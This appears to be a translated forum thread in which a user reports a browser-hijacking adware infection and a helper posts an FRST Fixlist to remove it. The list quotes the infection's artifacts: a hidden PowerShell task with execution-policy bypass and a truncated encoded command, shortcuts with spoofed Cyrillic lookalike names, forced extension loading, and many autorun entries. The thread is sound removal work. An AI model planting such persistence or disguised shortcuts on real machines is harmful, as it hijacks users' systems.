Chinese browser virus - malicious software

nataszka663 20 Jun 2017 21:17
  • #1 20 Jun 2017 21:17
    nataszka663
    Level 2

    Unfortunately, while downloading a Polish language pack I clicked a button which, instead of downloading what I needed, downloaded malicious software onto my computer. I don't know exactly what it is, probably some kind of malware. Anyway, every so often various pages open up in a "browser" shaped like a squirrel. I have already tried Malwarebytes - nothing. AdwCleaner couldn't handle it either, and rkill failed too. So I ran FRST and Addition, which I will attach. I will also attach the ADW report; thanks in advance for your help!

  • Helpful post
    #2 20 Jun 2017 21:52
    Kolobos
    Computer specialist

    Uninstall:
    AVG PC TuneUp 2015
    System Healer

    Run the Fixlist below in Safe Mode.

    Next to frst.exe, create a file named Fixlist.txt with the following content:
    CloseProcesses:
    Task: {0FEFA930-4387-41F8-AB08-EE0B8BE9DA0E} - System32\Tasks\Kaypall Phone => Rundll32.exe "C:\Program Files\Kaypall Phone\Kaypall Phone.dll",NRmWpXPs <==== UWAGA
    Task: {49F6D071-2AA8-46FC-981C-B27482CDE0AB} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-06-18] (Microleaves) <==== UWAGA
    Task: {4F36B074-0C57-46BC-96B7-5847595F1131} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
    Task: {6D776B98-3FB5-4007-B4B6-C5E71165F41F} - System32\Tasks\MyReader => Rundll32.exe "C:\Program Files\MyReader\MyReader.dll",cyvBpo <==== UWAGA
    Task: {6E9F78FE-5150-4940-8092-F5A2BEBD863C} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-12-26] () <==== UWAGA
    Task: {793C6C6B-3608-4648-9DEB-ED56C250F284} - System32\Tasks\{7A797A47-040C-0C05-0E11-7E0B0C7F117F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsA (dane wartości zawierają 9952 znaków więcej). <==== UWAGA
    Task: {96CA102A-864D-485B-9F20-3BD859616994} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
    Task: {9D6D9CDF-1596-4798-82A1-0675046A69BD} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-06-19] (UC Web Inc.) <==== UWAGA
    Task: {A0A338E9-E9CF-4F29-B84F-3F160362B671} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-03-07] (UCWeb Inc) <==== UWAGA
    Task: {A18B4EFA-3011-4C88-9571-2B4095F7F6AE} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe [2016-12-26] () <==== UWAGA
    Task: {A966D23B-3130-42A6-B90B-71908E86A85D} - System32\Tasks\0b5c76bb7599252601fe688dbc063f23 => sc start 0b5c76bb7599252601fe688dbc063f23 <==== UWAGA
    Task: {D7617236-45EA-4D46-A3B0-BDCC65E51D75} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
    Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== UWAGA
    WMI_ActiveScriptEventConsumer_ASEC: <===== UWAGA
    Shortcut: C:\Users\shenzai\Desktop\Fаllоut 4.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual4tuollaf.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\Gоogle Chromе.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\Lеft 4 Dеаd 2.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualemag.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\Орerа.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\programy\DАЕMОN Тоols Litе.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualtd.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\programy\Nехon Lаunсhеr.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\programy\NСsоft Launcher.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualcn.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\programy\kutafonga\pierdołki\dd\Nowy folder (2)\Nowy folder\WаrThunder.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\Nowy folder\Lеft 4 Dеаd 2.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualemag.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnet Еxрlorer.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.erolpxei.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WаrThunder.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Nеxon Lаunсher.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Ridеrs оf Icаrus.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехрlorеr (Nо Аdd-ons).lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.erolpxei.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоoglе Chromе.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnet Ехрlоrеr Brоwser.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.erolpxei.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WаrThundеr.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Gоoglе Chrоme.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Мozilla Firеfoх.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.xoferif.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Оpera.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gооglе Chrоme.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\АIОN Frеe-to-Play.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualcn.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzilla Firefох.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.xoferif.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ореra.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\Public\Desktop\АION Frее-tо-Рlay.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualcn.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\Public\Desktop\Мozilla Firefох.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.xoferif.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\Public\Desktop\ТERА.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual-aret.bat (Brak pliku) <===== Cyrillic
    ShortcutWithArgument: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    2017-06-19 19:24 - 2017-03-07 22:09 - 00599440 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
    2017-06-19 20:05 - 2017-06-20 20:00 - 00486400 _____ () C:\Windows\TEMP\gFF8.tmp.exe
    2017-06-19 20:34 - 2017-06-19 20:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\fhzrd0gttza\5zct21km4e1.exe
    2017-06-19 20:34 - 2017-06-19 20:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\nura0dmmhpv\dsljdbb31r0.exe
    2017-06-19 20:34 - 2017-06-19 20:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\ldmagzil55c\ftp0i4wlwfx.exe
    2017-06-19 20:34 - 2017-06-19 20:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\zmzrs3tx0wf\f2nwb323hsr.exe
    2017-06-19 21:05 - 2017-06-19 21:05 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\q05qybgj5jq\ghqbgghizvj.exe
    2017-06-19 21:05 - 2017-06-19 21:05 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\sugqxgvlxy5\ri3bke4qsm3.exe
    2017-06-19 21:21 - 2017-06-19 21:21 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\qpmxs3bw3ng\oznlho02uba.exe
    2017-06-19 21:21 - 2017-06-19 21:21 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\dz5uts4wvfd\kjg4k3pbawg.exe
    2017-06-19 21:21 - 2017-06-19 21:21 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\qkbq50xf10b\cw1uk2ojliy.exe
    2017-06-19 21:22 - 2017-06-19 21:22 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\hrjq31jjr1s\fpjvn4zz34s.exe
    2017-06-19 21:33 - 2017-06-19 21:33 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\rqva4vu3i5j\bzpxt0lba5z.exe
    2017-06-19 21:33 - 2017-06-19 21:33 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\yry2vavm0el\41suzs5cthi.exe
    2017-06-19 21:34 - 2017-06-19 21:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\s3hgbczwrde\ageptk0vzca.exe
    2017-06-19 21:34 - 2017-06-19 21:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\c0hqm2ldlwn\n2glakpvl1m.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\dybmia1ijuv\q0y2d250eqq.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\y5biuysevnl\4phjuookzub.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01040384 _____ () C:\Program Files\4PBTGJC09T\JYDKCXGWC.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\toczbv142yx\m2sxde1ymwr.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01076736 _____ () C:\Users\shenzai\AppData\Local\Temp\is-FFIER.tmp\2VTPN1cGL.tmp
    2017-06-20 20:10 - 2017-06-20 20:10 - 01076736 _____ () C:\Users\shenzai\AppData\Local\Temp\is-3F3K2.tmp\SFD6Dg27D.tmp
    2017-06-20 20:10 - 2017-06-20 20:10 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\ghiuy3lhhxs\n32a1l3edju.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01040384 _____ () C:\Program Files\W5M8VVC41Z\W5M8VVC41.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\koqyvsaiayp\41rp2vfgvbd.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01040384 _____ () C:\Program Files\MM5915986V\MM5915986.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01040384 _____ () C:\Program Files\1R2KLZCDR0\1R2KLZCDR.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01040384 _____ () C:\Program Files\G8P4KU1YKZ\G8P4KU1YK.exe
    2017-06-20 20:12 - 2017-06-13 17:34 - 03513856 _____ () C:\Program Files (x86)\YeaDesktop\YeaDesktop.exe
    2017-06-20 20:13 - 2017-06-20 20:13 - 02072576 _____ () C:\Users\shenzai\AppData\Local\Temp\00009416\msiql.exe
    2016-12-26 12:19 - 2016-12-26 12:19 - 01183392 _____ () C:\Program Files (x86)\SystemHealer\RescueMonitor.exe
    2017-06-20 20:10 - 2008-10-15 16:44 - 00205312 _____ () C:\Users\shenzai\AppData\Local\Temp\is-1PM3K.tmp\itdownload.dll
    2017-06-20 20:10 - 2008-10-15 16:44 - 00205312 _____ () C:\Users\shenzai\AppData\Local\Temp\is-HUS7U.tmp\itdownload.dll
    2017-06-19 19:24 - 2017-03-07 22:09 - 00281528 _____ () C:\Program Files (x86)\UCBrowser\Application\6.1.2107.204\courgette.dll
    2017-06-19 19:24 - 2017-03-07 22:09 - 00305040 _____ () C:\Program Files (x86)\UCBrowser\Application\6.1.2107.204\stats_uploader.exe
    AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444]
    AlternateDataStreams: C:\Windows\system32\drivers:x64 [1498914]
    AlternateDataStreams: C:\Windows\system32\drivers:x86 [1223458]
    Hosts:
    () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
    () C:\Windows\Temp\gFF8.tmp.exe
    (E7AZC52) C:\Program Files (x86)\af5eu2vwtg0\LY6738TGEWIMZ7H.exe
    (E7AZC52) C:\Program Files (x86)\bcztbxttabt\REIL0L171Q8H6VB.exe
    () C:\Users\shenzai\AppData\Roaming\fhzrd0gttza\5zct21km4e1.exe
    () C:\Users\shenzai\AppData\Roaming\nura0dmmhpv\dsljdbb31r0.exe
    (BE6) C:\Program Files\SR251QB9FR\SR251QB9F.exe
    () C:\Users\shenzai\AppData\Roaming\ldmagzil55c\ftp0i4wlwfx.exe
    () C:\Users\shenzai\AppData\Roaming\zmzrs3tx0wf\f2nwb323hsr.exe
    (BE6) C:\Program Files\WRTZITNY23\WRTZITNY2.exe
    (BE6) C:\Program Files\XC5Z0BU2Y6\XC5Z0BU2Y.exe
    () C:\Users\shenzai\AppData\Roaming\q05qybgj5jq\ghqbgghizvj.exe
    () C:\Users\shenzai\AppData\Roaming\sugqxgvlxy5\ri3bke4qsm3.exe
    (15USG) C:\Program Files\93I1LBPZ1T\93I1LBPZ1.exe
    (15USG) C:\Program Files\ISQS1Z69P0\ISQS1Z69P.exe
    () C:\Users\shenzai\AppData\Roaming\qpmxs3bw3ng\oznlho02uba.exe
    () C:\Users\shenzai\AppData\Roaming\dz5uts4wvfd\kjg4k3pbawg.exe
    (15USG) C:\Program Files\393WNXK8JD\393WNXK8J.exe
    () C:\Users\shenzai\AppData\Roaming\qkbq50xf10b\cw1uk2ojliy.exe
    (15USG) C:\Program Files\1RBOSEKT1M\R5OI8DWV0.exe
    () C:\Users\shenzai\AppData\Roaming\hrjq31jjr1s\fpjvn4zz34s.exe
    (15USG) C:\Program Files\5XR5VD3DZ9\5XR5VD3DZ.exe
    () C:\Users\shenzai\AppData\Roaming\rqva4vu3i5j\bzpxt0lba5z.exe
    () C:\Users\shenzai\AppData\Roaming\yry2vavm0el\41suzs5cthi.exe
    (15USG) C:\Program Files\UG6R5GFKJM\8NI04M7N8.exe
    () C:\Users\shenzai\AppData\Roaming\s3hgbczwrde\ageptk0vzca.exe
    (15USG) C:\Program Files\TKW87PQMG6\TKW87PQMG.exe
    () C:\Users\shenzai\AppData\Roaming\c0hqm2ldlwn\n2glakpvl1m.exe
    (15USG) C:\Program Files\MUMESLMP8Z\KUTN0UGDP.exe
    () C:\Users\shenzai\AppData\Roaming\dybmia1ijuv\q0y2d250eqq.exe
    (McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
    () C:\Users\shenzai\AppData\Roaming\y5biuysevnl\4phjuookzub.exe
    () C:\Program Files\4PBTGJC09T\JYDKCXGWC.exe
    () C:\Users\shenzai\AppData\Roaming\toczbv142yx\m2sxde1ymwr.exe
    ( ) C:\Users\shenzai\AppData\Local\Temp\TQ2XAFtrr\2VTPN1cGL.exe
    () C:\Users\shenzai\AppData\Local\Temp\is-FFIER.tmp\2VTPN1cGL.tmp
    ( ) C:\Users\shenzai\AppData\Local\Temp\LxQsks7rp\SFD6Dg27D.exe
    () C:\Users\shenzai\AppData\Local\Temp\is-3F3K2.tmp\SFD6Dg27D.tmp
    () C:\Users\shenzai\AppData\Roaming\ghiuy3lhhxs\n32a1l3edju.exe
    () C:\Program Files\W5M8VVC41Z\W5M8VVC41.exe
    () C:\Users\shenzai\AppData\Roaming\koqyvsaiayp\41rp2vfgvbd.exe
    () C:\Program Files\MM5915986V\MM5915986.exe
    () C:\Program Files\1R2KLZCDR0\1R2KLZCDR.exe
    () C:\Program Files\G8P4KU1YKZ\G8P4KU1YK.exe
    () C:\Program Files (x86)\YeaDesktop\YeaDesktop.exe
    () C:\Users\shenzai\AppData\Local\Temp\00009416\msiql.exe
    (Microleaves LTD) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
    (UCWeb Inc.) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
    () C:\Program Files (x86)\SystemHealer\RescueMonitor.exe
    (Microleaves LTD) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
    (Microleaves LTD) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
    HKLM\...\RunOnce: [OMEWPRODUCT_X42ZJ] => C:\Program Files (x86)\af5eu2vwtg0\LY6738TGEWIMZ7H.exe [340480 2017-06-19] (E7AZC52) <===== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_MZRWZ] => C:\Program Files (x86)\bcztbxttabt\REIL0L171Q8H6VB.exe [340480 2017-06-19] (E7AZC52) <===== UWAGA
    HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [m1ckmqiyyko] => C:\Users\shenzai\AppData\Roaming\fhzrd0gttza\5zct21km4e1.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [ykvhbgwumi5] => C:\Users\shenzai\AppData\Roaming\nura0dmmhpv\dsljdbb31r0.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [3RPOYVY7LIBE1MG] => C:\Program Files\SR251QB9FR\SR251QB9F.exe [1040384 2017-06-19] (BE6)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [nswedruz4bd] => C:\Users\shenzai\AppData\Roaming\ldmagzil55c\ftp0i4wlwfx.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [1heclwiz3o5] => C:\Users\shenzai\AppData\Roaming\zmzrs3tx0wf\f2nwb323hsr.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [K9SOJ7TC07URG4K] => C:\Program Files\WRTZITNY23\WRTZITNY2.exe [1040384 2017-06-19] (BE6)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [GS9STDA8LNBJTVK] => C:\Program Files\XC5Z0BU2Y6\XC5Z0BU2Y.exe [1040384 2017-06-19] (BE6)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [deumr2hprqx] => C:\Users\shenzai\AppData\Roaming\q05qybgj5jq\ghqbgghizvj.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [gsskaqbsoaj] => C:\Users\shenzai\AppData\Roaming\sugqxgvlxy5\ri3bke4qsm3.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [BXWXFNFZRYB4LF7] => C:\Program Files\93I1LBPZ1T\93I1LBPZ1.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [W85WCZH87YEU86Q] => C:\Program Files\ISQS1Z69P0\ISQS1Z69P.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [eaodoacsku5] => C:\Users\shenzai\AppData\Roaming\qpmxs3bw3ng\oznlho02uba.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [evvvz30iqof] => C:\Users\shenzai\AppData\Roaming\dz5uts4wvfd\kjg4k3pbawg.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [NGU3F4DMF4T3UWG] => C:\Program Files\393WNXK8JD\393WNXK8J.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [sqfez104yk3] => C:\Users\shenzai\AppData\Roaming\qkbq50xf10b\cw1uk2ojliy.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [0JOF64PVYYOGA3B] => C:\Program Files\1RBOSEKT1M\R5OI8DWV0.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [znwhwgfugvn] => C:\Users\shenzai\AppData\Roaming\hrjq31jjr1s\fpjvn4zz34s.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [B7S4B3507VF332X] => C:\Program Files\5XR5VD3DZ9\5XR5VD3DZ.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [llpdejluifq] => C:\Users\shenzai\AppData\Roaming\rqva4vu3i5j\bzpxt0lba5z.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [y5h20hpyd3b] => C:\Users\shenzai\AppData\Roaming\yry2vavm0el\41suzs5cthi.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [7AOB8TB0M6289ZW] => C:\Program Files\UG6R5GFKJM\8NI04M7N8.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [p22bowjecva] => C:\Users\shenzai\AppData\Roaming\s3hgbczwrde\ageptk0vzca.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [443HBEPMFNP2COW] => C:\Program Files\TKW87PQMG6\TKW87PQMG.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [rl4z0km5ntl] => C:\Users\shenzai\AppData\Roaming\c0hqm2ldlwn\n2glakpvl1m.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [AWOOOMLMR5QRU33] => C:\Program Files\MUMESLMP8Z\KUTN0UGDP.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [3tezerajqf2] => C:\Users\shenzai\AppData\Roaming\dybmia1ijuv\q0y2d250eqq.exe [8192 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [fegr4qybouf] => C:\Users\shenzai\AppData\Roaming\y5biuysevnl\4phjuookzub.exe [8192 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [RRANUT1PEITPDP0] => C:\Program Files\4PBTGJC09T\JYDKCXGWC.exe [1040384 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [2fvtlwpnztc] => C:\Users\shenzai\AppData\Roaming\toczbv142yx\m2sxde1ymwr.exe [8192 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [pxmvybgpfen] => C:\Users\shenzai\AppData\Roaming\ghiuy3lhhxs\n32a1l3edju.exe [8192 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [LCK8DF8V64WRGN0] => C:\Program Files\W5M8VVC41Z\W5M8VVC41.exe [1040384 2017-06-20] ()
